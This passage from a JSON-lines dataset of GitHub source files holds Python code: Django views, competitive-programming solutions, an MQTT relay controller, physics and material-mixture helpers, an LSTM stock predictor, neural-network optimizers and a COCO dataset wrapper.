send_challenge_confirm_email(request, form.instance, False)\n # if neither is true, either need to wait for csec to review,\n # or csec has already rejected\n return redirect(\"/cand/reviewconfirm/{}\".format(pk))\n return render(request, \"candidate/challenge_confirm.html\", context=context)\n\n\n@login_and_permission(\"candidate.change_offchallenge\")\ndef confirm_challenge(request, id):\n if request.method != \"POST\":\n raise Http404()\n\n offchallenge = get_object_or_404(OffChallenge, id=id)\n offchallenge.officer_confirmed = True\n offchallenge.save()\n\n next_page = request.POST.get(\"next\", \"/\")\n return redirect(next_page)\n\n\n@login_and_permission(\"candidate.view_offchallenge\")\ndef officer_review_confirmation(request, pk):\n \"\"\"The page displayed after officer reviews challenge and clicks \"submit.\" \"\"\"\n challenge = OffChallenge.objects.get(id=pk)\n requester_name = challenge.requester.get_full_name()\n context = {\n \"challenge\": challenge,\n \"requester_name\": requester_name,\n }\n return render(request, \"candidate/review_confirm.html\", 
context=context)\n","repo_name":"Gabe-Mitnick/hknweb","sub_path":"hknweb/candidate/views/officer_challenge/confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"25297606221","text":"import math\n\nlog = False\n\n\ndef inter(i_q, i_b):\n\n print(i_b + 1, flush=True)\n a = input()\n i_q += 1\n if a == 'N':\n b = -1\n else:\n b = int(a)\n if (log):\n # print(log_file)\n print(i_b + 1, a, file=log_file)\n return i_q, b\n\n\ndef get_bit_index(n, n_b):\n if n_b & 1:\n i_b = n - 1 - ((n_b - 1) >> 1)\n else:\n i_b = n_b >> 1\n return i_b\n\n\ndef algo(n):\n res = [0] * n\n n_b = 0\n i_q = 1\n i_same_reverse = [-1, -1]\n found_ind = False\n while i_q < 150 and n_b < n:\n if i_q % 10 == 1 and n_b > 0:\n # check and get new res\n compl = swap = compl_swap = same = True\n for ic in i_same_reverse:\n if ic >= 0:\n i_q, b = inter(i_q, ic)\n if res[ic] == b:\n compl = False\n else:\n same = False\n if res[n - 1 - ic] == b:\n compl_swap = False\n else:\n swap = False\n if (log):\n print(same, compl , swap , compl_swap , file=log_file)\n print('before',*res, file=log_file)\n if not same:\n if compl or compl_swap:\n for k in range(n_b ):\n i_k = get_bit_index(n, k)\n res[i_k] = 1 - res[i_k]\n if (log):\n print('compl ',*res, file=log_file)\n if found_ind and (swap or compl_swap):\n for k in range(0, (n_b ), 2):\n i_k = get_bit_index(n, k)\n res[i_k], res[n - 1 - i_k] = res[n - 1 - i_k], res[i_k]\n if (log):\n print('swap ',*res, file=log_file)\n if n_b&1 and (swap or compl_swap): n_b-=1\n\n i_b = get_bit_index(n, n_b)\n # if log: print(n,n_b, i_b, n_b & 1, bool(n_b & 1), n_b - 1, (n_b - 1) >> 1, n - 1 - ((n_b - 1) >> 1))\n i_q, b = inter(i_q, i_b)\n if b == -1: return -1\n res[i_b] = b\n if not found_ind and n_b & 1:\n if res[i_b] == res[n - 1 - i_b]:\n if i_same_reverse[0] == -1:\n i_same_reverse[0] = n - 1 - i_b\n if i_same_reverse[1] != -1: found_ind = True\n else:\n if i_same_reverse[1] == -1:\n i_same_reverse[1] = n - 1 - i_b\n if i_same_reverse[0] != -1: found_ind = True\n n_b += 1\n\n\n return res\n\n\ndef inp():\n if log:\n global log_file\n log_file = open('c:\\\\my\\\\log_sol.txt', \"w\")\n # print(log_file)\n t, n = (int(s) for s in input().split(\" \"))\n for i in range(1, t + 1):\n res = algo(n)\n if (log):\n print(*res, sep='', flush=True, file=log_file)\n if res == -1: break\n print(*res, sep='', flush=True)\n ok = input()\n if ok == 'N': break\n if log: log_file.close()\n\n\nif __name__ == '__main__':\n inp()\n","repo_name":"tivrfoa/codejam","sub_path":"2020/qualification-round/d/AndDziurak-d.py","file_name":"AndDziurak-d.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4253171213","text":"from django.shortcuts import render\nfrom core.models import Streak, Profile\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import CoinsEarnerLeaderBoard, CreatorLeaderBoard, ReferralLeaderBoard\n# Create your views here.\n\n\n\"\"\"\nAdd Pagination To All The Leaderboard\n\nAnd also make all the leaderboard daily\n\"\"\"\n\n\n\n\n# @login_required(redirect_field_name='next', login_url='account_login')\ndef LeaderboardView(request):\n user = request.user\n profile = None\n if user.is_authenticated:\n profile = Profile.objects.get(user=user)\n context={\n 'nav': 'leaderboard',\n 'profile': profile,\n }\n return render(request, 
'leaderboard/leaderboard.html', context)\n\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef StreakLeaderBoardView(request):\n user = request.user\n profile = user.profile\n instance = Streak.objects.get(profile=profile)\n leaders = Streak.objects.all().order_by('-length', '-question')[0:100]\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n # add the get absolute url function to the profile\n # add pagination and waypoint or ajax I think Ajax will be more controllable\n # index = 1\n context = {\n 'leaders': leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/streak.html', context)\n\n\n# add the function for reward that will be triggered by celery. it wont't be a view function\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef WealthLeaderBoardView(request,*args, **kwargs):\n user = request.user\n instance = CoinsEarnerLeaderBoard.objects.get(leader=user)\n leaders = CoinsEarnerLeaderBoard.objects.all().order_by('-coins')[0:100]\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n context = {\n 'leaders' : leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/wealth.html', context)\n\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef CreatorsLeaderBoardView(request,*args, **kwargs):\n user = request.user\n instance = CreatorLeaderBoard.objects.get(leader=user)\n leaders = CreatorLeaderBoard.objects.all().order_by('-coins')[0:100]\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n\n context = {\n 'leaders' : leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/wealth.html', context)\n\n\n\n\n@login_required(redirect_field_name='next', login_url='account_login')\ndef ReferralLeaderBoardView(request,*args, **kwargs):\n user = request.user\n leaders = ReferralLeaderBoard.objects.all().order_by('-refers')[0:100]\n instance = ReferralLeaderBoard.objects.get(leader=user)\n\n index = (*leaders,).index(instance) + 1 or \"1000+\"\n\n context = {\n 'leaders' : leaders,\n 'index': index,\n 'instance' : instance,\n }\n\n return render(request, 'leaderboard/referral.html', context)\n\n\n\n\ndef referrals(request):\n user = request.user\n if user.is_authenticated:\n instance = user.profile\n else:\n instance = user\n leaders = Profile.objects.all().order_by(\"-refercount\")[:100]\n # index = (*leaders,).index(instance) + 1 or \"100+\"\n\n context = {\n \"leaders\": leaders,\n # \"index\": index,\n 'instance': instance,\n }\n return render(request, 'leaderboard/referral.html', context)\n","repo_name":"PeaceTem/tothex","sub_path":"leaderboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3705460421","text":"\"\"\"Flask configuration.\"\"\"\nfrom os import environ, path\nfrom dotenv import load_dotenv\n\nbasedir = path.abspath(path.dirname(__file__))\n\nTESTING = True\nDEBUG = True\nFLASK_ENV = 'development'\nSTATIC_FOLDER = 'static'\nTEMPLATES_FOLDER = 'templates'","repo_name":"tj-oconnor/spaceheroes_ctf","sub_path":"web/web-spacebuds/src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"6"} +{"seq_id":"35665568316","text":"import paho.mqtt.client as mqtt\nimport time\nimport random\nfrom mqtt_init import 
*\n\n\n# broker IP adress:\nbroker=broker_ip\nrunning_time = 30 # in sec\nport=broker_port # for using web sockets\nglobal ON\nON=False\nTRH = 22.4\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \"+buf)\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\",rc)\ndef on_disconnect(client, userdata, flags, rc=0):\n print(\"DisConnected result code \"+str(rc))\ndef on_message(client,userdata,msg):\n global ON\n topic=msg.topic\n m_decode=str(msg.payload.decode(\"utf-8\",\"ignore\"))\n print(\"message received\",m_decode)\n #if 'HUMIDITY' not in m_decode:\n ON=msg_parse(m_decode)\n send_msg(client)\n\ndef msg_parse(m_decode):\n print(m_decode) \n rez=float(m_decode.split('Temperature: ')[1].split(' Humidity:')[0])\n #{\"addr\":0, \"cname\":\"LDR\", \"value\":1017}\n #{\"addr\":0, \"cname\":\"TEMPERATURE\", \"value\":32.00}\n # Temperature: 22.1 Humidity: 76.2\n if rez>TRH:\n return True\n return False\n\ndef send_msg(client):\n global ON\n # Following is an example for code turning a Relay device 'On':\n device_ID = \"3PI_22559442/sts\"\n # client.publish(\"matzi/0/3PI_22559442/sts\", ' {\"type\":\"set_state\", \"action\":\"set_value\", \"addr\":0, \"cname\":\"ONOFF\", \"value\":1}') \n if ON:\n client.publish(\"matzi/0/\"+device_ID, ' {\"type\":\"set_state\", \"action\":\"set_value\", \"addr\":0, \"cname\":\"ONOFF\", \"value\":1}') \n else:\n # and consequently 'OFF':\n client.publish(\"matzi/0/\"+device_ID, ' {\"type\":\"set_state\", \"action\":\"set_value\", \"addr\":0, \"cname\":\"ONOFF\", \"value\":0}')\n \n\nr=random.randrange(1,10000) # for creating unique client ID\nclientname=\"IOT_test-\"+str(r)\nclient = mqtt.Client(clientname, clean_session=True) # create new client instance\n\nclient.on_connect=on_connect #bind call back function\nclient.on_disconnect=on_disconnect\n#client.on_log=on_log\nclient.on_message=on_message\nclient.username_pw_set(username=username,password=password)\n\n\nprint(\"Connecting to broker \",broker)\nclient.connect(broker,int(port)) #connect to broker\n\n\n# Next loop will publishing all messages during running time\nclient.loop_start()\nclient.publish('testtopic/778',\"test1\")\n#client.subscribe(\"matzi/0/3PI_16145805/sts\") # button ID\n#client.subscribe(\"matzi/0/3PI_11310380/sts\") # REED ID\n#client.subscribe(\"matzi/0/3PI_3380731/sts\") # Light ID\nclient.subscribe('testtopic/778') # DTH ID\n\n#client.subscribe(\"matzi/#\")\ntime.sleep(running_time)\nclient.loop_stop()\nclient.disconnect() # disconnect\nprint(\"End of script run\")\n\n","repo_name":"yuryyu/IOT20","sub_path":"cubes_test.py","file_name":"cubes_test.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24793890163","text":"# enable 'from mctools import *'\n__all__ = [\"common\", \"fluka\", \"mcnp\", \"phits\" ]\n\nimport subprocess, os, sys\nfrom math import sqrt\n\ndef L2E(l, m=1.674927351e-27): #constants.physical_constants['neutron mass'][0]):\n \"\"\"\n Angstrom to MeV converter.\n m = particle mass in kg.\n \"\"\"\n l = l*1.0E-10 # Angstrom -> meter\n e = 1.602176565e-19 # constants.physical_constants['atomic unit of charge'][0]\n h = 6.62606957e-34 # constants.physical_constants['Planck constant'][0]\n p = h/l\n energy = p*p/(2*m)\n return energy/e/1.0E+6\n\ndef E2L(energy, m=1.674927351e-27): #constants.physical_constants['neutron mass'][0]):\n \"\"\"\n MeV to Angstrom converter\n m = 
particle mass in kg\n \"\"\"\n e = 1.602176565e-19 # constants.physical_constants['atomic unit of charge'][0]\n h = 6.62606957e-34 # constants.physical_constants['Planck constant'][0]\n l = h/sqrt(2*m*energy*e)*1.0E+7\n return l\n\n\ndef GetVariable(f, var):\n \"\"\"\n Return the variable value from the CombLayer-generated xml file\n \"\"\"\n p = subprocess.Popen(\"getvariable %s %s\" % (f, var), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output, error = p.communicate()\n return output\n\ndef checkPaths(dirs, files, verbose=True):\n \"\"\"\n Checks if folders/files exist\n \"\"\"\n for d in dirs:\n if not os.path.isdir(d):\n if verbose:\n print(d, \"does not exist\", file=sys.stderr)\n return 1\n\n for f in files:\n if not os.path.isfile(f):\n print(f, \"does not exist\", file=sys.stderr)\n return 2\n return 0\n\n\n### MIXTURES ###\n\nclass Compound:\n \"\"\" Compound is a mixture of materials with given volume fractions \"\"\"\n def __init__(self, name):\n self.name = name\n self.materials = []\n self.vf = [] # volume fractions of corresponding materials\n\n def AddMaterial(self, m, vf):\n \"\"\" Adds material m with given volume fraction vf \"\"\"\n self.materials.append(m)\n self.vf.append(vf)\n\n def GetDensity(self):\n \"\"\" Return density of compound \"\"\"\n rho = 0.0\n for j,m in enumerate(self.materials):\n rho += m.density*self.vf[j]\n return rho\n\n def GetMassFraction(self, material):\n \"\"\" Return mass fraction of the given material \"\"\"\n mf = None\n for im, m in enumerate(self.materials):\n if m == material:\n mf = m.density*self.vf[im]/self.GetDensity()\n if mf == None:\n raise IOError(\"Compound %s does not contain material %s\" % (self.name, material.name))\n return mf\n\n\n def GetAtomicFractions(self):\n \"\"\" Calculates mass fractions \"\"\"\n vf = [] # volume fractions of isotopes\n mf = [] # mass fractions of isotopes\n af = [] # atomic fractions of isotopes\n iname = [] # isotope names\n for im,m in enumerate(self.materials):\n for ii, i in enumerate(m.isotopes):\n curvf = m.GetVolumeFraction(i)*self.vf[im] # current volume fraction\n vf.append(curvf)\n curmf = self.GetMassFraction(m)*i.A*m.nn[ii]/m.GetA() # current mass fraction\n mf.append(curmf)\n af.append(curmf/i.A)\n iname.append(i.name)\n\n # normalisation:\n s = sum(af)\n for i,v in enumerate(af):\n af[i] = v/s\n\n return dict(list(zip(iname, af)))\n\n def PrintAtomicFractions(self):\n for i,f in sorted(self.GetAtomicFractions().items()):\n print(i,f)\n print(\"Density: \", -self.GetDensity())\n\n def Print(self):\n print(\"Compound:\", self.name)\n print(\" Density:\", self.GetDensity())\n for j,m in enumerate(self.materials):\n print(\"\", self.vf[j], \"%\")\n m.Print()\n print(\" Mass fractions:\")\n self.GetAtomicFractions()\n\nclass Material:\n \"\"\" Material is made of isotopes \"\"\"\n def __init__(self, name, density):\n self.name = name\n self.isotopes = []\n self.nn = [] # number of corresponding isotopes\n self.density = density\n\n def AddIsotope(self, i, n=1):\n self.isotopes.append(i)\n self.nn.append(n)\n\n def GetA(self):\n \"\"\" Return atomic weight \"\"\"\n s = 0.0;\n for j,i in enumerate(self.isotopes):\n s += self.nn[j]*i.A;\n return s\n\n def GetVolumeFraction(self, isotope):\n \"\"\" Return volume fraction of the given isotope \"\"\"\n vf = None\n for j,i in enumerate(self.isotopes):\n if i == isotope:\n vf = self.nn[j]/sum(self.nn)\n if vf == None:\n raise IOError(\"Material %s does not have isotope %s\" % (self.name, isotope.name))\n return vf\n\n def 
Print(self):\n print(\" Material:\", self.name)\n print(\" Density:\", self.density)\n print(\" Atomic weight: \", self.GetA(), \"g/mole\")\n print(\" Isotopes:\")\n for j,i in enumerate(self.isotopes):\n# print(\" \"*2, self.nn[j], end='')\n i.Print()\n print(\" Volume fraction in %s: %g\" % (self.name, self.GetVolumeFraction(i)))\n\nclass Isotope:\n \"\"\" Isotopes form material \"\"\"\n def __init__(self, name, A):\n self.name = name\n self.A = A # atomic weight\n\n def Print(self):\n print(\"\\t%s \\t A = %g\" % (self.name, self.A))\n\n### END MIXTURES ###\n","repo_name":"kbat/mc-tools","sub_path":"mctools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"6"} +{"seq_id":"28244406963","text":"#coding=utf-8\nfrom appium import webdriver\nimport time, os, re\n\n# strip() removes the trailing newline that os.popen().read() includes\nplatformVersion = os.popen('adb shell getprop ro.build.version.release').read().strip()\n# read the device id\nreadDeviceId = list(os.popen('adb devices').readlines())\n# use a regular expression to extract the id\ndeviceId = re.findall(r'^\\w*\\b', readDeviceId[1])[0]\n\ndesired_caps = {\n 'platformName': 'Android',\n 'platformVersion': platformVersion,\n 'deviceName': deviceId,\n 'appPackage': 'io.newtype.eddid.app',\n 'appActivity': 'com.bartech.app.main.launcher.LauncherActivity',\n # 'unicodeKeyboard': True,\n # 'resetKeyboard': True\n}\n\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\n# driver.find_element_by_id(\"digit_1\").click()\n\n# driver.find_element_by_id(\"op_add\").click()\n\n# driver.find_element_by_id(\"digit_2\").click()\n\n# driver.find_element_by_id(\"eq\").click()\ntime.sleep(10)\n\ndriver.quit()","repo_name":"sevencrime/Python_Demo","sub_path":"Android_Demo/55.py","file_name":"55.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75188754426","text":"T = int(input())\nfor test_case in range(1, T+1):\n word = input()\n stack = []\n\n for char in word: # while pushing every character onto the stack\n if stack: # if the stack is not empty\n if char == stack[-1]: # if it equals the most recently pushed character (i.e. consecutive)\n stack.pop() # remove it\n else: # if it differs from the most recently pushed character (not consecutive)\n stack.append(char) # push it\n else: # if the stack is empty\n stack.append(char) # push it\n\n ans = len(stack)\n print(f'#{test_case} {ans}')\n\n# Below is my first attempt\n# 1) accessing the top via stack[-1] was a good idea\n# 2) a string is already a list-like sequence, so chars = list(word) is unnecessary\n# 3) the \"if stack:\" check for a non-empty stack is needed\n# 3-1) with that check there is no need to seed the stack with a 0 to avoid an index error and then report stack[1:]\n\n'''\nT = int(input())\nfor test_case in range(1, T+1):\n word = input()\n chars = list(word)\n stack = [0] # guard against index error\n\n for i in range(len(chars)): # while pushing every character onto the stack\n if chars[i] != stack[-1]: # if it differs from the most recently pushed character (not consecutive)\n stack.append(chars[i]) # push it\n else: # if it equals the most recently pushed character (consecutive)\n stack.pop() # remove it\n\n ans = len(stack[1:]) # element count excluding the guard 0\n print(f'#{test_case} {ans}')\n'''\n","repo_name":"zacinthepark/Problem-Solving-Notes","sub_path":"swea/0818_반복문자지우기.py","file_name":"0818_반복문자지우기.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17248515544","text":"# Code from here: https://github.com/albermax/innvestigate/blob/master/examples/notebooks/imagenet_compare_methods.ipynb\nimport keras\nimport keras.backend\nimport 
imp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport innvestigate\nimport innvestigate.utils\nimport keras.applications.vgg16 as vgg16\nfrom keras.applications.vgg16 import decode_predictions\n\nmodel, preprocess = vgg16.VGG16(), vgg16.preprocess_input\nbase_dir = os.path.dirname(__file__)\nutils = imp.load_source(\"utils\", os.path.join(base_dir, \"utils.py\"))\nimgnetutils = imp.load_source(\"utils_imagenet\", \"utils_imagenet.py\")\n\ndef inverse_graymap(X):\n return imgnetutils.graymap(np.max(X) - X)\n\n\n# Methods we use and some properties.\nmethods = [\n# NAME OPT.PARAMS POSTPROC FXN TITLE\n# Show input.\n(\"input\", {}, imgnetutils.image, \"Input\"),\n# Function\n(\"gradient\", {\"postprocess\": \"abs\"}, inverse_graymap, \"Gradient\"),\n(\"smoothgrad\", {\"augment_by_n\": 64, \"postprocess\": \"square\"}, inverse_graymap, \"SmoothGrad\"),\n# Signal\n#(\"deconvnet\", {}, imgnetutils.bk_proj, \"Deconvnet\"),\n#(\"guided_backprop\", {}, imgnetutils.bk_proj, \"Guided Backprop\"),\n#(\"pattern.net\", {}, imgnetutils.bk_proj, \"PatternNet\"),\n# Interaction\n#(\"deep_taylor\", {}, imgnetutils.heatmap, \"Deep Taylor\"),\n#(\"pattern.attribution\", {}, imgnetutils.heatmap, \"PatternAttribution\"),\n#(\"input_t_gradient\", {}, imgnetutils.heatmap, \"Input * Gradient\"),\n#(\"integrated_gradients\", {\"steps\": 64}, imgnetutils.heatmap, \"Integrated Gradients\"),\n#(\"lrp.z\", {}, imgnetutils.heatmap, \"LRP-Z\"),\n#(\"lrp.epsilon\", {\"epsilon\": 1}, imgnetutils.heatmap, \"LRP-Epsilon\"),\n#(\"lrp.sequential_preset_a_flat\",{\"epsilon\": 1}, imgnetutils.heatmap, \"LRP-PresetAFlat\"),\n#(\"lrp.sequential_preset_b_flat\",{\"epsilon\": 1}, imgnetutils.heatmap, \"LRP-PresetBFlat\"),\n]\n\nif __name__ == \"__main__\":\n # Load an image.\n image = utils.load_image(\n os.path.join(base_dir, \"..\", \"..\", \"manuscript\", \"images\", \"dog_and_book.jpeg\"), 224)\n\n # Get model\n yhat = model.predict(preprocess(image[None]))\n label = decode_predictions(yhat)\n label = label[0][0]\n print('%s (%.2f%%)' % (label[1], label[2]*100))\n # Strip softmax layer\n model = innvestigate.utils.model_wo_softmax(model)\n for method in methods:\n print(method[0])\n analyzer = innvestigate.create_analyzer(method[0],\n model,\n **method[1])\n if method[0] == \"input\":\n a = image[None]\n a = (a - a.min())/ (a.max() - a.min())\n else:\n x = preprocess(image[None])\n # use preprocessing from other script\n a = analyzer.analyze(x)\n a = imgnetutils.postprocess(a, \"BGRtoRGB\", False)\n a = method[2](a)\n plt.imshow(a[0], cmap=\"seismic\", clim=(-1, 1))\n plt.axis('off')\n plt.title(method[3])\n plt.savefig(\"dog_and_book_\" + method[0] + \".png\", bbox_inches = \"tight\")\n\n","repo_name":"christophM/interpretable-ml-book","sub_path":"scripts/dl-feature-attribution/feature-attribution-dl.py","file_name":"feature-attribution-dl.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":4584,"dataset":"github-code","pt":"6"} +{"seq_id":"24764655241","text":"# -*- coding: utf-8 -*- \nimport numpy as np \n \nclass Optimizer(object): \n '''Optimizer base class\\n \n ''' \n def __init__(self, parameters, lr): \n self.params = parameters \n self.lr = lr \n \n def step(self): \n raise NotImplementedError \n \nclass SGD(Optimizer): \n '''Stochastic Gradient Descent\\n \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n \n Attributes: \n params (generator): generator named params in Module class \n lr 
(float): learning rate \n ''' \n def __init__(self, parameters, lr=0.001): \n super().__init__(parameters, lr) \n \n def step(self): \n for i in self.params(): \n i.data -= self.lr * i.grad \n \nclass Momentum(Optimizer): \n '''Momentum SGD\\n \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n momentum (float): momentum \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n momentum (float): momentum \n velocity (dict): stores velocities for each parameter \n ''' \n def __init__(self, parameters, lr=0.001, momentum=0.9): \n super().__init__(parameters, lr) \n self.momentum = momentum \n self.velocity = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.velocity: \n self.velocity[i] = np.zeros_like(var.grad) \n self.velocity[i] = self.momentum * self.velocity[i] + (1 - self.momentum) * var.grad \n var.data -= self.lr * self.velocity[i] \n \nclass AdaGrad(Optimizer): \n '''Adaptive Subgradient\\n \n Adagrad is an optimizer with parameter-specific learning rates, which are adapted relative to how frequently a parameter gets updated during training. \n The more updates a parameter receives, the smaller the updates. \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n eps (float): constant that stablizes the calculation \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n eps (float): constant \n h (dict): stores adoptive term \n ''' \n def __init__(self, parameters, lr=0.001, eps=1e-8): \n super().__init__(parameters, lr) \n self.eps = eps \n self.h = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.h: \n self.h[i] = np.zeros_like(var.grad) \n self.h[i] += var.grad * var.grad \n var.data -= self.lr * var.grad / np.sqrt(self.h[i]+self.eps) \n \nclass Adadelta(Optimizer): \n '''ADADELTA\\n \n This method dynamically adapts over time using only first order information and has minimal computational overhead beyond vanilla stochastic gradient descent. \n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n decay_rate (float): decay rate \n eps (float): constant that stablizes the calculation \n \n Attributes: \n params (generator): generator named params in Module class \n gamma (float): decay rate \n eps (float): constant \n g (dict): accumulate grads \n u (dict): accumulate updates \n \n Reference: \n https://arxiv.org/pdf/1212.5701.pdf \n ''' \n def __init__(self, parameters, decay_rate=0.95, eps=1e-6): \n super().__init__(parameters, None) \n self.rho = decay_rate \n self.eps = eps \n self.g = {} \n self.u = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.g: \n self.g[i] = np.zeros_like(var.grad) \n if i not in self.u: \n self.u[i] = np.zeros_like(var.grad) \n self.g[i] = self.rho * self.g[i] + (1-self.rho) * var.grad**2 \n update = -np.sqrt(self.u[i]+self.eps) * var.grad / np.sqrt(self.g[i]+self.eps) \n self.u[i] = self.rho * self.u[i] + (1-self.rho) * update**2 \n var.data += update \n \nclass RMSProp(Optimizer): \n '''RMSProp\\n \n This optimizer is usually a good choice for recurrent neural networks. 
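A sketch of the update implemented in step() below: h = decay_rate*h + (1-decay_rate)*grad**2, then param -= lr * grad / sqrt(h + eps).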
\n \n Args: \n parameters (OrderedDict): parameters stored in a Module \n lr (float): learning rate \n decay_rate (float): forgets past gradients at rate of this \n eps (float): \n \n Attributes: \n params (generator): generator named params in Module class \n lr (float): learning rate \n gamma (float): forgets past gradients at rate of this \n eps (float): \n h (dict): stores adoptive term \n ''' \n def __init__(self, parameters, lr=0.001, decay_rate=0.99, eps=1e-8): \n super().__init__(parameters, lr) \n self.gamma = decay_rate \n self.eps = eps \n self.h = {} \n \n def step(self): \n for i, var in enumerate(self.params()): \n if i not in self.h: \n self.h[i] = np.zeros_like(var.grad) \n self.h[i] = self.gamma * self.h[i] + (1-self.gamma) * var.grad**2 \n var.data -= self.lr * var.grad / np.sqrt(self.h[i]+self.eps) \n","repo_name":"Kashu7100/Qualia","sub_path":"qualia/optim.py","file_name":"optim.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"36008142459","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn as sklearn\nimport tensorflow as tensorflow\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\n\n# from google.colab import drive\n# drive.mount('/content/drive')\n\n# ls drive/MyDrive/Personal/LSTM/stock_trading_data.csv\n\n# Load the sample data\ndata = pd.read_csv('./stock_trading_data.csv')\n\n\n#print(data.info())\n\ndata.loc[[0, 2, 3]]\n\n# Extract the 'Close' price\nclose_prices = data['Close'].values.reshape(-1, 1)\n# Normalize the data between 0 and 1\nscaler = MinMaxScaler()\nclose_prices_scaled = scaler.fit_transform(close_prices)\n\n# Prepare the data for the LSTM model\nsequence_length = 10\nX, y = [], []\nfor i in range(len(close_prices_scaled) - sequence_length):\n X.append(close_prices_scaled[i:i + sequence_length])\n y.append(close_prices_scaled[i + sequence_length])\nX, y = np.array(X), np.array(y)\n\n# Split the data into training and testing sets\nsplit_ratio = 0.8\nsplit_index = int(split_ratio * len(X))\nX_train, X_test = X[:split_index], X[split_index:]\ny_train, y_test = y[:split_index], y[split_index:]\n\n\n# Build the LSTM model\nmodel = Sequential()\nmodel.add(LSTM(units=100, return_sequences=True, input_shape=(sequence_length, 1)))\nmodel.add(LSTM(units=150))\nmodel.add(Dense(units=1))\n\n\nmodel.compile(optimizer='adam', loss='mean_squared_error')\n\n# Train the model\nmodel.fit(X_train, y_train, epochs=100, batch_size=32)\n\n# Evaluate the model\nloss = model.evaluate(X_test, y_test)\nprint(f\"Test loss: {loss}\")\n\n\ny_pred = model.predict(X_test)\n\ny_pred = scaler.inverse_transform(y_pred)\ny_test = scaler.inverse_transform(y_test)\n\n#save model\nmodel.save('drive/MyDrive/Personal/LSTM/Stock_Price_model')\n\nprint(f\"Test loss: {loss}\")\n\n# Plot the predictions against the true values\nplt.plot(y_test[:], label='True Prices')\nplt.plot(y_pred, label='Predicted Prices')\nplt.legend()\nplt.show()\n","repo_name":"Tundeh/LSTM","sub_path":"stock_price_prediction.py","file_name":"stock_price_prediction.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8068218051","text":"\"\"\"Modified detection dataset that can be pickled. 
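(The upstream torchvision datapoints wrapper is not picklable, as discussed in the links below, so its wrapping logic is inlined here; this keeps the dataset usable, for example, with multiprocessing DataLoader workers.)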
See links below for more info\nhttps://github.com/pytorch/vision/issues/6753#:~:text=The%20transforms%20v2%20API%20looks%20very%20nice\nhttps://github.com/pytorch/vision/pull/7860\n\"\"\"\nfrom typing import Any, Tuple, Callable, Optional, List\n\nimport torch\nfrom pycocotools import mask\nfrom torchvision import datapoints\nimport logging\nfrom torchvision.datapoints._dataset_wrapper import (\n list_of_dicts_to_dict_of_lists,\n)\nfrom torchvision.datasets import CocoDetection\nfrom torchvision.transforms.v2 import functional as F\n\n\nclass CocoDetectionV2(CocoDetection):\n def __init__(\n self,\n root: str,\n annFile: str,\n transforms: Callable[..., Any] | None = None,\n no_add_ids: Optional[List[int]] = None,\n ) -> None:\n self.__logger = logging.getLogger(__name__)\n super().__init__(root, annFile)\n self.v2_transforms = transforms\n self.__logger.info(\n f\"COCO dataset size before removal of missing anns {len(self.ids)}\"\n )\n valid_ids = [id for id in self.ids if id not in no_add_ids]\n self.ids = valid_ids\n self.__logger.info(\n f\"COCO dataset size after removal of missing anns: {len(self.ids)}\"\n )\n self.no_add_ids = no_add_ids\n\n def __getitem__(self, index: int) -> Tuple[Any, Any]:\n sample = super().__getitem__(index)\n sample = self.wrapper(index, sample)\n if self.v2_transforms is not None:\n sample = self.v2_transforms(*sample)\n return sample\n\n def segmentation_to_mask(self, segmentation, *, 